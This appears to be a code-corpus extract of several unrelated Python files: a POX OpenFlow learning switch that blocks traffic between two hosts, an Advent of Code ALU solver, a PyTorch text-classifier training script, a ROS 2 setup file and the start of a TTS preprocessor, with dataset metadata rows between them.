msg.actions.append(of.ofp_action_output(port = event.port))
event.connection.send(msg)
# This is the packet that just came in -- we want to
# install the rule and also resend the packet.
msg = of.ofp_flow_mod()
msg.data = event.ofp # Forward the incoming packet
msg.match.dl_src = packet.src
msg.match.dl_dst = packet.dst
msg.actions.append(of.ofp_action_output(port = dst_port))
event.connection.send(msg)
log.debug("Installing %s <-> %s" % (packet.src, packet.dst))
def launch (disable_flood = False):
global all_ports
if disable_flood:
all_ports = of.OFPP_ALL
core.openflow.addListenerByName("PacketIn", _handle_PacketIn)
log.info("Pair-Learning switch running.")
| 34.38 | 152 | 0.717859 |
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str, str_to_dpid
log = core.getLogger()
table = {}
# but it's not clear if all switches support this, so we make
all_ports = of.OFPP_FLOOD
def _handle_PacketIn (event):
packet = event.parsed
table[(event.connection, packet.src)] = event.port
dst_port = table.get((event.connection, packet.dst))
ip_match = of.ofp_match.from_packet(packet, event.port)
if (ip_match.nw_src == '192.168.1.1' and ip_match.nw_dst == '192.168.1.2') or (ip_match.nw_src == '192.168.1.2' and ip_match.nw_dst == '192.168.1.1'):
log.debug("Drop packets between h1 to h2")
msg = of.ofp_packet_out()
msg.buffer_id = event.ofp.buffer_id
msg.in_port = event.port
event.connection.send(msg)
return
if dst_port is None:
msg = of.ofp_packet_out(data = event.ofp)
msg.actions.append(of.ofp_action_output(port = all_ports))
event.connection.send(msg)
log.debug("Installing %s <-> all ports" % packet.src)
else:
msg = of.ofp_flow_mod()
msg.match.dl_dst = packet.src
msg.match.dl_src = packet.dst
msg.actions.append(of.ofp_action_output(port = event.port))
event.connection.send(msg)
msg = of.ofp_flow_mod()
msg.data = event.ofp
msg.match.dl_src = packet.src
msg.match.dl_dst = packet.dst
msg.actions.append(of.ofp_action_output(port = dst_port))
event.connection.send(msg)
log.debug("Installing %s <-> %s" % (packet.src, packet.dst))
def launch (disable_flood = False):
global all_ports
if disable_flood:
all_ports = of.OFPP_ALL
core.openflow.addListenerByName("PacketIn", _handle_PacketIn)
log.info("Pair-Learning switch running.")
| true | true |
1c332c87eea00365557e19e91322e96fdb2d1137 | 3,378 | py | Python | day_24/part_1/main.py | MoeFourtyTwo/advent-of-code | 123a716a26add390913eb268a59ef68b45666ef4 | [
"MIT"
] | null | null | null | day_24/part_1/main.py | MoeFourtyTwo/advent-of-code | 123a716a26add390913eb268a59ef68b45666ef4 | [
"MIT"
] | null | null | null | day_24/part_1/main.py | MoeFourtyTwo/advent-of-code | 123a716a26add390913eb268a59ef68b45666ef4 | [
"MIT"
] | null | null | null | from __future__ import annotations
import timeit
import fire
import pandas as pd
from tqdm import tqdm
def main(input_file: str = "input.txt", search_max: bool = True) -> None:
instructions = parse_instructions(input_file)
alus = pd.DataFrame(
{
"w": [0],
"x": 0,
"y": 0,
"z": 0,
"input": 0,
}
)
t = tqdm(instructions)
for instruction in t:
t.set_description(f"Working with {len(alus)} ALUs")
if len(instruction) == 3:
instruction, arg_a, arg_b = instruction
if instruction == "add":
alus[arg_a] += alus[arg_b]
elif instruction == "mul":
alus[arg_a] *= alus[arg_b]
elif instruction == "mod":
alus[arg_a] %= alus[arg_b]
alus = optimize(alus, t)
elif instruction == "div":
alus[arg_a] = (alus[arg_a] / alus[arg_b]).astype(int)
alus = optimize(alus, t)
elif instruction == "eql":
alus[arg_a] = (alus[arg_a] == alus[arg_b]).astype(int)
alus = optimize(alus, t)
elif instruction == "add_value":
alus[arg_a] += arg_b
elif instruction == "mul_value":
alus[arg_a] *= arg_b
elif instruction == "mod_value":
alus[arg_a] %= arg_b
alus = optimize(alus, t)
elif instruction == "div_value":
alus[arg_a] = (alus[arg_a] / arg_b).astype(int)
alus = optimize(alus, t)
elif instruction == "eql_value":
alus[arg_a] = (alus[arg_a] == arg_b).astype(int)
alus = optimize(alus, t)
else:
alus = optimize(alus, t)
t.set_description(f"New input data. Increasing number of ALUs to {9 * len(alus)}")
alus["input"] *= 10
target_df = pd.DataFrame(columns=alus.columns)
for i in range(9, 0, -1) if search_max else range(1, 10):
new_df = alus.copy()
new_df["input"] += i
new_df[instruction[1]] = i
target_df = target_df.append(new_df)
alus = target_df
alus = optimize(alus, t)
valid_rows = alus[alus["z"] == 0]
print(f"Value: {valid_rows['input'].max() if search_max else valid_rows['input'].min()}")
def optimize(alus: pd.DataFrame, t) -> pd.DataFrame:
t.set_description(f"Optimizing {len(alus)} ALUs")
alus.drop_duplicates(subset=["w", "x", "y", "z"], inplace=True)
t.set_description(f"Working with {len(alus)} ALUs")
return alus
def parse_instructions(input_file: str) -> list[tuple[str, str] | tuple[str, str, str | int]]:
with open(input_file) as f:
lines = f.read().splitlines()
instructions = []
for line in lines:
instruction, *args = line.split()
if len(args) == 2:
arg_a, arg_b = args
if arg_b in "wxzy":
instructions.append((instruction, arg_a, arg_b))
else:
instructions.append((instruction + "_value", arg_a, int(arg_b)))
else:
instructions.append((instruction, args[0]))
return instructions
if __name__ == "__main__":
print(timeit.Timer(lambda: fire.Fire(main)).timeit(1))
| 35.1875 | 94 | 0.530491 | from __future__ import annotations
import timeit
import fire
import pandas as pd
from tqdm import tqdm
def main(input_file: str = "input.txt", search_max: bool = True) -> None:
instructions = parse_instructions(input_file)
alus = pd.DataFrame(
{
"w": [0],
"x": 0,
"y": 0,
"z": 0,
"input": 0,
}
)
t = tqdm(instructions)
for instruction in t:
t.set_description(f"Working with {len(alus)} ALUs")
if len(instruction) == 3:
instruction, arg_a, arg_b = instruction
if instruction == "add":
alus[arg_a] += alus[arg_b]
elif instruction == "mul":
alus[arg_a] *= alus[arg_b]
elif instruction == "mod":
alus[arg_a] %= alus[arg_b]
alus = optimize(alus, t)
elif instruction == "div":
alus[arg_a] = (alus[arg_a] / alus[arg_b]).astype(int)
alus = optimize(alus, t)
elif instruction == "eql":
alus[arg_a] = (alus[arg_a] == alus[arg_b]).astype(int)
alus = optimize(alus, t)
elif instruction == "add_value":
alus[arg_a] += arg_b
elif instruction == "mul_value":
alus[arg_a] *= arg_b
elif instruction == "mod_value":
alus[arg_a] %= arg_b
alus = optimize(alus, t)
elif instruction == "div_value":
alus[arg_a] = (alus[arg_a] / arg_b).astype(int)
alus = optimize(alus, t)
elif instruction == "eql_value":
alus[arg_a] = (alus[arg_a] == arg_b).astype(int)
alus = optimize(alus, t)
else:
alus = optimize(alus, t)
t.set_description(f"New input data. Increasing number of ALUs to {9 * len(alus)}")
alus["input"] *= 10
target_df = pd.DataFrame(columns=alus.columns)
for i in range(9, 0, -1) if search_max else range(1, 10):
new_df = alus.copy()
new_df["input"] += i
new_df[instruction[1]] = i
target_df = target_df.append(new_df)
alus = target_df
alus = optimize(alus, t)
valid_rows = alus[alus["z"] == 0]
print(f"Value: {valid_rows['input'].max() if search_max else valid_rows['input'].min()}")
def optimize(alus: pd.DataFrame, t) -> pd.DataFrame:
t.set_description(f"Optimizing {len(alus)} ALUs")
alus.drop_duplicates(subset=["w", "x", "y", "z"], inplace=True)
t.set_description(f"Working with {len(alus)} ALUs")
return alus
def parse_instructions(input_file: str) -> list[tuple[str, str] | tuple[str, str, str | int]]:
with open(input_file) as f:
lines = f.read().splitlines()
instructions = []
for line in lines:
instruction, *args = line.split()
if len(args) == 2:
arg_a, arg_b = args
if arg_b in "wxzy":
instructions.append((instruction, arg_a, arg_b))
else:
instructions.append((instruction + "_value", arg_a, int(arg_b)))
else:
instructions.append((instruction, args[0]))
return instructions
if __name__ == "__main__":
print(timeit.Timer(lambda: fire.Fire(main)).timeit(1))
| true | true |
1c332c9df7e7b1bcd442640eb38fe7704e22ec65 | 10,076 | py | Python | classifier/train.py | shivammehta007/NLPinEnglishLearning | ae869d868e39df9b1787134ba6e964acd385dd2e | [
"Apache-2.0"
] | 1 | 2020-05-27T22:21:33.000Z | 2020-05-27T22:21:33.000Z | classifier/train.py | shivammehta007/NLPinEnglishLearning | ae869d868e39df9b1787134ba6e964acd385dd2e | [
"Apache-2.0"
] | null | null | null | classifier/train.py | shivammehta007/NLPinEnglishLearning | ae869d868e39df9b1787134ba6e964acd385dd2e | [
"Apache-2.0"
] | null | null | null | """
Training script for the model
"""
import argparse
import logging
import os
import time
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm.auto import tqdm
from config.hyperparameters import (
BATCH_SIZE,
BIDIRECTION,
DROPOUT,
EMBEDDING_DIM,
EPOCHS,
FREEZE_EMBEDDINGS,
HIDDEN_DIM,
LR,
N_LAYERS,
WEIGHT_DECAY,
CNN_N_FILTER,
CNN_FILTER_SIZES,
LINEAR_HIDDEN_DIM,
)
from config.root import (
LOGGING_FORMAT,
LOGGING_LEVEL,
TRAINED_CLASSIFIER_FOLDER,
TRAINED_CLASSIFIER_RNNHIDDEN,
device,
seed_all,
SEED,
)
from datasetloader import GrammarDasetMultiTag, GrammarDasetAnswerTag
from helperfunctions import evaluate, train, train_tag_model, evaluate_tag_model
from model import (
RNNHiddenClassifier,
RNNMaxpoolClassifier,
CNN2dClassifier,
CNN1dClassifier,
RNNFieldClassifer,
CNN1dExtraLayerClassifier,
)
from utility import categorical_accuracy, epoch_time
# Initialize logger for this file
logger = logging.getLogger(__name__)
logging.basicConfig(level=LOGGING_LEVEL, format=LOGGING_FORMAT)
def count_parameters(model):
"""Method to count the number of parameters"""
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def initialize_new_model(
classifier_type,
dataset,
embedding_dim,
hidden_dim,
n_layers,
bidirectional,
dropout,
freeze_embeddings,
dataset_tag,
linear_hidden_dim,
):
"""Method to initialise new model, takes in dataset object and hyperparameters as parameter"""
logger.debug("Initializing Model")
if dataset_tag == "multi":
VOCAB_SIZE = len(dataset.question.vocab)
PAD_IDX = dataset.question.vocab.stoi[dataset.question.pad_token]
pretrained_embeddings = dataset.question.vocab.vectors
UNK_IDX = dataset.question.vocab.stoi[dataset.question.unk_token]
else:
VOCAB_SIZE = len(dataset.text.vocab)
PAD_IDX = dataset.text.vocab.stoi[dataset.text.pad_token]
pretrained_embeddings = dataset.text.vocab.vectors
UNK_IDX = dataset.text.vocab.stoi[dataset.text.unk_token]
OUTPUT_LAYERS = len(dataset.label.vocab)
if classifier_type == "RNNHiddenClassifier":
model = RNNHiddenClassifier(
VOCAB_SIZE,
embedding_dim,
hidden_dim,
OUTPUT_LAYERS,
n_layers,
bidirectional,
dropout,
PAD_IDX,
)
elif classifier_type == "RNNMaxpoolClassifier":
model = RNNMaxpoolClassifier(
VOCAB_SIZE,
embedding_dim,
hidden_dim,
OUTPUT_LAYERS,
n_layers,
bidirectional,
dropout,
PAD_IDX,
)
elif classifier_type == "CNN2dClassifier":
model = CNN2dClassifier(
VOCAB_SIZE,
embedding_dim,
CNN_N_FILTER,
CNN_FILTER_SIZES,
OUTPUT_LAYERS,
dropout,
PAD_IDX,
)
elif classifier_type == "CNN1dClassifier":
model = CNN1dClassifier(
VOCAB_SIZE,
embedding_dim,
CNN_N_FILTER,
CNN_FILTER_SIZES,
OUTPUT_LAYERS,
dropout,
PAD_IDX,
)
elif classifier_type == "RNNFieldClassifer":
model = RNNFieldClassifer(
VOCAB_SIZE,
embedding_dim,
hidden_dim,
OUTPUT_LAYERS,
n_layers,
bidirectional,
dropout,
PAD_IDX,
dataset.tags,
)
elif classifier_type == "CNN1dExtraLayerClassifier":
model = CNN1dExtraLayerClassifier(
VOCAB_SIZE,
embedding_dim,
CNN_N_FILTER,
CNN_FILTER_SIZES,
linear_hidden_dim,
OUTPUT_LAYERS,
dropout,
PAD_IDX,
)
else:
raise TypeError("Invalid Classifier selected")
if freeze_embeddings:
model.embedding.weight.requires_grad = False
logger.debug(
"Freeze Embeddings Value {}: {}".format(
freeze_embeddings, model.embedding.weight.requires_grad
)
)
logger.info(
"Model Initialized with {:,} trainiable parameters".format(
count_parameters(model)
)
)
# Initialize pretrained word embeddings
model.embedding.weight.data.copy_(pretrained_embeddings)
# Initialize Padding and Unknown as 0
model.embedding.weight.data[UNK_IDX] = torch.zeros(embedding_dim)
model.embedding.weight.data[PAD_IDX] = torch.zeros(embedding_dim)
logger.debug("Copied PreTrained Embeddings")
return model
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Utility to train the Model")
parser.add_argument(
"-s",
"--seed",
default=SEED,
help="Set custom seed for reproducibility",
type=int,
)
parser.add_argument(
"-loc",
"--model-location",
default=None,
help="Give an already trained model location to use and train more epochs on it",
)
parser.add_argument(
"-b",
"--bidirectional",
default=BIDIRECTION,
help="Makes the model Bidirectional",
type=bool,
)
parser.add_argument(
"-d",
"--dropout",
default=DROPOUT,
help="Dropout count for the model",
type=float,
)
parser.add_argument(
"-e",
"--embedding-dim",
default=EMBEDDING_DIM,
help="Embedding Dimensions",
type=int,
)
parser.add_argument(
"-hd",
"--hidden-dim",
default=HIDDEN_DIM,
help="Hidden dimensions of the RNN",
type=int,
)
parser.add_argument(
"-l", "--n-layers", default=N_LAYERS, help="Number of layers in RNN", type=int
)
parser.add_argument(
"-lr",
"--learning-rate",
default=LR,
help="Learning rate of Adam Optimizer",
type=float,
)
parser.add_argument(
"-n",
"--epochs",
default=EPOCHS,
help="Number of Epochs to train model",
type=int,
)
parser.add_argument(
"-batch",
"--batch_size",
default=BATCH_SIZE,
help="Number of Epochs to train model",
type=int,
)
parser.add_argument(
"-f",
"--freeze-embeddings",
default=FREEZE_EMBEDDINGS,
help="Freeze Embeddings of Model",
type=int,
)
parser.add_argument(
"-t",
"--tag",
default="answeronly",
choices=["multi", "answeronly"],
help="Use two different dataset type, multi type and Answer only",
)
parser.add_argument(
"-l2",
"--l2-regularization",
default=WEIGHT_DECAY,
help="Value of alpha in l2 regularization 0 means no regularization ",
type=float,
)
parser.add_argument(
"-m",
"--model",
default="RNNHiddenClassifier",
choices=[
"RNNHiddenClassifier",
"RNNMaxpoolClassifier",
"RNNFieldClassifier",
"CNN2dClassifier",
"CNN1dClassifier",
"RNNFieldClassifer",
"CNN1dExtraLayerClassifier",
],
help="select the classifier to train on",
)
parser.add_argument(
"-lhd",
"--linear-hidden-dim",
default=LINEAR_HIDDEN_DIM,
help="Freeze Embeddings of Model",
type=int,
)
args = parser.parse_args()
seed_all(args.seed)
logger.debug(args)
logger.debug("Custom seed set with: {}".format(args.seed))
logger.info("Loading Dataset")
if args.tag == "multi":
dataset = GrammarDasetMultiTag.get_iterators(args.batch_size)
else:
dataset = GrammarDasetAnswerTag.get_iterators(args.batch_size)
logger.info("Dataset Loaded Successfully")
if args.model_location:
model = torch.load(args.model_location)
else:
model = initialize_new_model(
args.model,
dataset,
args.embedding_dim,
args.hidden_dim,
args.n_layers,
args.bidirectional,
args.dropout,
args.freeze_embeddings,
args.tag,
args.linear_hidden_dim,
)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(
model.parameters(), lr=LR, weight_decay=args.l2_regularization
)
model = model.to(device)
criterion = criterion.to(device)
logger.info(model)
if not os.path.exists(TRAINED_CLASSIFIER_FOLDER):
os.mkdir(TRAINED_CLASSIFIER_FOLDER)
best_test_loss = float("inf")
for epoch in range(int(args.epochs)):
start_time = time.time()
if args.model == "RNNFieldClassifer":
train_loss, train_acc = train_tag_model(
model, dataset.train_iterator, optimizer, criterion, dataset.tags
)
test_loss, test_acc = evaluate_tag_model(
model, dataset.test_iterator, criterion, dataset.tags
)
else:
train_loss, train_acc = train(
model, dataset.train_iterator, optimizer, criterion, args.tag
)
test_loss, test_acc = evaluate(
model, dataset.test_iterator, criterion, args.tag
)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
if test_loss < best_test_loss:
best_test_loss = test_loss
torch.save(
model,
os.path.join(TRAINED_CLASSIFIER_FOLDER, TRAINED_CLASSIFIER_RNNHIDDEN),
)
print(f"Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s")
print(f"\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%")
print(f"\t Val. Loss: {test_loss:.3f} | Val. Acc: {test_acc*100:.2f}%")
| 26.308094 | 98 | 0.599047 | import argparse
import logging
import os
import time
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm.auto import tqdm
from config.hyperparameters import (
BATCH_SIZE,
BIDIRECTION,
DROPOUT,
EMBEDDING_DIM,
EPOCHS,
FREEZE_EMBEDDINGS,
HIDDEN_DIM,
LR,
N_LAYERS,
WEIGHT_DECAY,
CNN_N_FILTER,
CNN_FILTER_SIZES,
LINEAR_HIDDEN_DIM,
)
from config.root import (
LOGGING_FORMAT,
LOGGING_LEVEL,
TRAINED_CLASSIFIER_FOLDER,
TRAINED_CLASSIFIER_RNNHIDDEN,
device,
seed_all,
SEED,
)
from datasetloader import GrammarDasetMultiTag, GrammarDasetAnswerTag
from helperfunctions import evaluate, train, train_tag_model, evaluate_tag_model
from model import (
RNNHiddenClassifier,
RNNMaxpoolClassifier,
CNN2dClassifier,
CNN1dClassifier,
RNNFieldClassifer,
CNN1dExtraLayerClassifier,
)
from utility import categorical_accuracy, epoch_time
logger = logging.getLogger(__name__)
logging.basicConfig(level=LOGGING_LEVEL, format=LOGGING_FORMAT)
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def initialize_new_model(
classifier_type,
dataset,
embedding_dim,
hidden_dim,
n_layers,
bidirectional,
dropout,
freeze_embeddings,
dataset_tag,
linear_hidden_dim,
):
logger.debug("Initializing Model")
if dataset_tag == "multi":
VOCAB_SIZE = len(dataset.question.vocab)
PAD_IDX = dataset.question.vocab.stoi[dataset.question.pad_token]
pretrained_embeddings = dataset.question.vocab.vectors
UNK_IDX = dataset.question.vocab.stoi[dataset.question.unk_token]
else:
VOCAB_SIZE = len(dataset.text.vocab)
PAD_IDX = dataset.text.vocab.stoi[dataset.text.pad_token]
pretrained_embeddings = dataset.text.vocab.vectors
UNK_IDX = dataset.text.vocab.stoi[dataset.text.unk_token]
OUTPUT_LAYERS = len(dataset.label.vocab)
if classifier_type == "RNNHiddenClassifier":
model = RNNHiddenClassifier(
VOCAB_SIZE,
embedding_dim,
hidden_dim,
OUTPUT_LAYERS,
n_layers,
bidirectional,
dropout,
PAD_IDX,
)
elif classifier_type == "RNNMaxpoolClassifier":
model = RNNMaxpoolClassifier(
VOCAB_SIZE,
embedding_dim,
hidden_dim,
OUTPUT_LAYERS,
n_layers,
bidirectional,
dropout,
PAD_IDX,
)
elif classifier_type == "CNN2dClassifier":
model = CNN2dClassifier(
VOCAB_SIZE,
embedding_dim,
CNN_N_FILTER,
CNN_FILTER_SIZES,
OUTPUT_LAYERS,
dropout,
PAD_IDX,
)
elif classifier_type == "CNN1dClassifier":
model = CNN1dClassifier(
VOCAB_SIZE,
embedding_dim,
CNN_N_FILTER,
CNN_FILTER_SIZES,
OUTPUT_LAYERS,
dropout,
PAD_IDX,
)
elif classifier_type == "RNNFieldClassifer":
model = RNNFieldClassifer(
VOCAB_SIZE,
embedding_dim,
hidden_dim,
OUTPUT_LAYERS,
n_layers,
bidirectional,
dropout,
PAD_IDX,
dataset.tags,
)
elif classifier_type == "CNN1dExtraLayerClassifier":
model = CNN1dExtraLayerClassifier(
VOCAB_SIZE,
embedding_dim,
CNN_N_FILTER,
CNN_FILTER_SIZES,
linear_hidden_dim,
OUTPUT_LAYERS,
dropout,
PAD_IDX,
)
else:
raise TypeError("Invalid Classifier selected")
if freeze_embeddings:
model.embedding.weight.requires_grad = False
logger.debug(
"Freeze Embeddings Value {}: {}".format(
freeze_embeddings, model.embedding.weight.requires_grad
)
)
logger.info(
"Model Initialized with {:,} trainiable parameters".format(
count_parameters(model)
)
)
model.embedding.weight.data.copy_(pretrained_embeddings)
model.embedding.weight.data[UNK_IDX] = torch.zeros(embedding_dim)
model.embedding.weight.data[PAD_IDX] = torch.zeros(embedding_dim)
logger.debug("Copied PreTrained Embeddings")
return model
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Utility to train the Model")
parser.add_argument(
"-s",
"--seed",
default=SEED,
help="Set custom seed for reproducibility",
type=int,
)
parser.add_argument(
"-loc",
"--model-location",
default=None,
help="Give an already trained model location to use and train more epochs on it",
)
parser.add_argument(
"-b",
"--bidirectional",
default=BIDIRECTION,
help="Makes the model Bidirectional",
type=bool,
)
parser.add_argument(
"-d",
"--dropout",
default=DROPOUT,
help="Dropout count for the model",
type=float,
)
parser.add_argument(
"-e",
"--embedding-dim",
default=EMBEDDING_DIM,
help="Embedding Dimensions",
type=int,
)
parser.add_argument(
"-hd",
"--hidden-dim",
default=HIDDEN_DIM,
help="Hidden dimensions of the RNN",
type=int,
)
parser.add_argument(
"-l", "--n-layers", default=N_LAYERS, help="Number of layers in RNN", type=int
)
parser.add_argument(
"-lr",
"--learning-rate",
default=LR,
help="Learning rate of Adam Optimizer",
type=float,
)
parser.add_argument(
"-n",
"--epochs",
default=EPOCHS,
help="Number of Epochs to train model",
type=int,
)
parser.add_argument(
"-batch",
"--batch_size",
default=BATCH_SIZE,
help="Number of Epochs to train model",
type=int,
)
parser.add_argument(
"-f",
"--freeze-embeddings",
default=FREEZE_EMBEDDINGS,
help="Freeze Embeddings of Model",
type=int,
)
parser.add_argument(
"-t",
"--tag",
default="answeronly",
choices=["multi", "answeronly"],
help="Use two different dataset type, multi type and Answer only",
)
parser.add_argument(
"-l2",
"--l2-regularization",
default=WEIGHT_DECAY,
help="Value of alpha in l2 regularization 0 means no regularization ",
type=float,
)
parser.add_argument(
"-m",
"--model",
default="RNNHiddenClassifier",
choices=[
"RNNHiddenClassifier",
"RNNMaxpoolClassifier",
"RNNFieldClassifier",
"CNN2dClassifier",
"CNN1dClassifier",
"RNNFieldClassifer",
"CNN1dExtraLayerClassifier",
],
help="select the classifier to train on",
)
parser.add_argument(
"-lhd",
"--linear-hidden-dim",
default=LINEAR_HIDDEN_DIM,
help="Freeze Embeddings of Model",
type=int,
)
args = parser.parse_args()
seed_all(args.seed)
logger.debug(args)
logger.debug("Custom seed set with: {}".format(args.seed))
logger.info("Loading Dataset")
if args.tag == "multi":
dataset = GrammarDasetMultiTag.get_iterators(args.batch_size)
else:
dataset = GrammarDasetAnswerTag.get_iterators(args.batch_size)
logger.info("Dataset Loaded Successfully")
if args.model_location:
model = torch.load(args.model_location)
else:
model = initialize_new_model(
args.model,
dataset,
args.embedding_dim,
args.hidden_dim,
args.n_layers,
args.bidirectional,
args.dropout,
args.freeze_embeddings,
args.tag,
args.linear_hidden_dim,
)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(
model.parameters(), lr=LR, weight_decay=args.l2_regularization
)
model = model.to(device)
criterion = criterion.to(device)
logger.info(model)
if not os.path.exists(TRAINED_CLASSIFIER_FOLDER):
os.mkdir(TRAINED_CLASSIFIER_FOLDER)
best_test_loss = float("inf")
for epoch in range(int(args.epochs)):
start_time = time.time()
if args.model == "RNNFieldClassifer":
train_loss, train_acc = train_tag_model(
model, dataset.train_iterator, optimizer, criterion, dataset.tags
)
test_loss, test_acc = evaluate_tag_model(
model, dataset.test_iterator, criterion, dataset.tags
)
else:
train_loss, train_acc = train(
model, dataset.train_iterator, optimizer, criterion, args.tag
)
test_loss, test_acc = evaluate(
model, dataset.test_iterator, criterion, args.tag
)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
if test_loss < best_test_loss:
best_test_loss = test_loss
torch.save(
model,
os.path.join(TRAINED_CLASSIFIER_FOLDER, TRAINED_CLASSIFIER_RNNHIDDEN),
)
print(f"Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s")
print(f"\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%")
print(f"\t Val. Loss: {test_loss:.3f} | Val. Acc: {test_acc*100:.2f}%")
| true | true |
1c332df2de45291065787fb30c0fb88048124ea9 | 1,161 | py | Python | ros2trace/setup.py | hliberacki/ros2_tracing | c0a3512137382bd97c5a013526d3d4f59f58c165 | [
"Apache-2.0"
] | null | null | null | ros2trace/setup.py | hliberacki/ros2_tracing | c0a3512137382bd97c5a013526d3d4f59f58c165 | [
"Apache-2.0"
] | null | null | null | ros2trace/setup.py | hliberacki/ros2_tracing | c0a3512137382bd97c5a013526d3d4f59f58c165 | [
"Apache-2.0"
] | null | null | null | from setuptools import find_packages
from setuptools import setup
package_name = 'ros2trace'
setup(
name=package_name,
version='4.0.0',
packages=find_packages(exclude=['test']),
data_files=[
('share/' + package_name, ['package.xml']),
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
],
install_requires=['ros2cli'],
zip_safe=True,
maintainer=(
'Christophe Bedard, '
'Ingo Lütkebohle'
),
maintainer_email=(
'bedard.christophe@gmail.com, '
'ingo.luetkebohle@de.bosch.com'
),
author='Christophe Bedard',
author_email='fixed-term.christophe.bourquebedard@de.bosch.com',
url='https://gitlab.com/ros-tracing/ros2_tracing',
keywords=[],
description='The trace command for ROS 2 command line tools.',
long_description=(
'The package provides the trace command '
'for the ROS 2 command line tools.'
),
license='Apache 2.0',
tests_require=['pytest'],
entry_points={
'ros2cli.command': [
f'trace = {package_name}.command.trace:TraceCommand',
],
}
)
| 27.642857 | 68 | 0.625323 | from setuptools import find_packages
from setuptools import setup
package_name = 'ros2trace'
setup(
name=package_name,
version='4.0.0',
packages=find_packages(exclude=['test']),
data_files=[
('share/' + package_name, ['package.xml']),
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
],
install_requires=['ros2cli'],
zip_safe=True,
maintainer=(
'Christophe Bedard, '
'Ingo Lütkebohle'
),
maintainer_email=(
'bedard.christophe@gmail.com, '
'ingo.luetkebohle@de.bosch.com'
),
author='Christophe Bedard',
author_email='fixed-term.christophe.bourquebedard@de.bosch.com',
url='https://gitlab.com/ros-tracing/ros2_tracing',
keywords=[],
description='The trace command for ROS 2 command line tools.',
long_description=(
'The package provides the trace command '
'for the ROS 2 command line tools.'
),
license='Apache 2.0',
tests_require=['pytest'],
entry_points={
'ros2cli.command': [
f'trace = {package_name}.command.trace:TraceCommand',
],
}
)
| true | true |
1c332e26d923bffec6844f1832e10218c0d0b55e | 4,277 | py | Python | preprocessor/preprocessor.py | thepowerfuldeez/VAENAR-TTS | 7ee40a5511118491269102bc6874a51c1d9959ee | [
"MIT"
] | null | null | null | preprocessor/preprocessor.py | thepowerfuldeez/VAENAR-TTS | 7ee40a5511118491269102bc6874a51c1d9959ee | [
"MIT"
] | null | null | null | preprocessor/preprocessor.py | thepowerfuldeez/VAENAR-TTS | 7ee40a5511118491269102bc6874a51c1d9959ee | [
"MIT"
] | null | null | null | import os
import random
import json
import tgt
import librosa
import numpy as np
from tqdm import tqdm
import audio as Audio
from text import grapheme_to_phoneme
from utils.tools import read_lexicon
from g2p_en import G2p
random.seed(1234)
class Preprocessor:
def __init__(self, config):
self.config = config
self.in_dir = config["path"]["raw_path"]
self.out_dir = config["path"]["preprocessed_path"]
self.val_size = config["preprocessing"]["val_size"]
self.sampling_rate = config["preprocessing"]["audio"]["sampling_rate"]
self.skip_len = config["preprocessing"]["audio"]["skip_len"]
self.trim_top_db = config["preprocessing"]["audio"]["trim_top_db"]
self.filter_length = config["preprocessing"]["stft"]["filter_length"]
self.hop_length = config["preprocessing"]["stft"]["hop_length"]
self.g2p = G2p()
self.lexicon = read_lexicon(config["path"]["lexicon_path"])
self.STFT = Audio.stft.TacotronSTFT(
config["preprocessing"]["stft"]["filter_length"],
config["preprocessing"]["stft"]["hop_length"],
config["preprocessing"]["stft"]["win_length"],
config["preprocessing"]["mel"]["n_mel_channels"],
config["preprocessing"]["audio"]["sampling_rate"],
config["preprocessing"]["mel"]["mel_fmin"],
config["preprocessing"]["mel"]["mel_fmax"],
)
def build_from_path(self):
os.makedirs((os.path.join(self.out_dir, "mel")), exist_ok=True)
print("Processing Data ...")
out = list()
n_frames = 0
# Compute pitch, energy, duration, and mel-spectrogram
speakers = {}
for i, speaker in enumerate(tqdm(os.listdir(self.in_dir))):
speakers[speaker] = i
for wav_name in tqdm(os.listdir(os.path.join(self.in_dir, speaker))):
if ".wav" not in wav_name:
continue
basename = wav_name.split(".")[0]
ret = self.process_utterance(speaker, basename)
if ret is None:
continue
else:
info, n = ret
out.append(info)
n_frames += n
# Save files
with open(os.path.join(self.out_dir, "speakers.json"), "w") as f:
f.write(json.dumps(speakers))
print(
"Total time: {} hours".format(
n_frames * self.hop_length / self.sampling_rate / 3600
)
)
random.shuffle(out)
out = [r for r in out if r is not None]
# Write metadata
with open(os.path.join(self.out_dir, "train.txt"), "w", encoding="utf-8") as f:
for m in out[self.val_size :]:
f.write(m + "\n")
with open(os.path.join(self.out_dir, "val.txt"), "w", encoding="utf-8") as f:
for m in out[: self.val_size]:
f.write(m + "\n")
return out
def process_utterance(self, speaker, basename):
wav_path = os.path.join(self.in_dir, speaker, "{}.wav".format(basename))
text_path = os.path.join(self.in_dir, speaker, "{}.lab".format(basename))
# Read and trim wav files
wav, _ = librosa.load(wav_path)
wav = wav.astype(np.float32)
if len(wav) < self.skip_len:
return None
wav = librosa.effects.trim(wav, top_db=self.trim_top_db, frame_length=self.filter_length, hop_length=self.hop_length)[0]
# Compute mel-scale spectrogram
mel_spectrogram, _ = Audio.stft.get_mel_spectrogram(self.STFT, wav)
mel_spectrogram = mel_spectrogram.squeeze(1).numpy()
# Read raw text
with open(text_path, "r") as f:
raw_text = f.readline().strip("\n")
# Get phoneme
phone = grapheme_to_phoneme(raw_text, self.g2p, self.lexicon)
text = "{" + " ".join(phone) + "}"
# Save files
mel_filename = "{}-mel-{}.npy".format(speaker, basename)
np.save(
os.path.join(self.out_dir, "mel", mel_filename),
mel_spectrogram.T,
)
return (
"|".join([basename, speaker, text, raw_text]),
mel_spectrogram.shape[1],
)
| 33.677165 | 128 | 0.574468 | import os
import random
import json
import tgt
import librosa
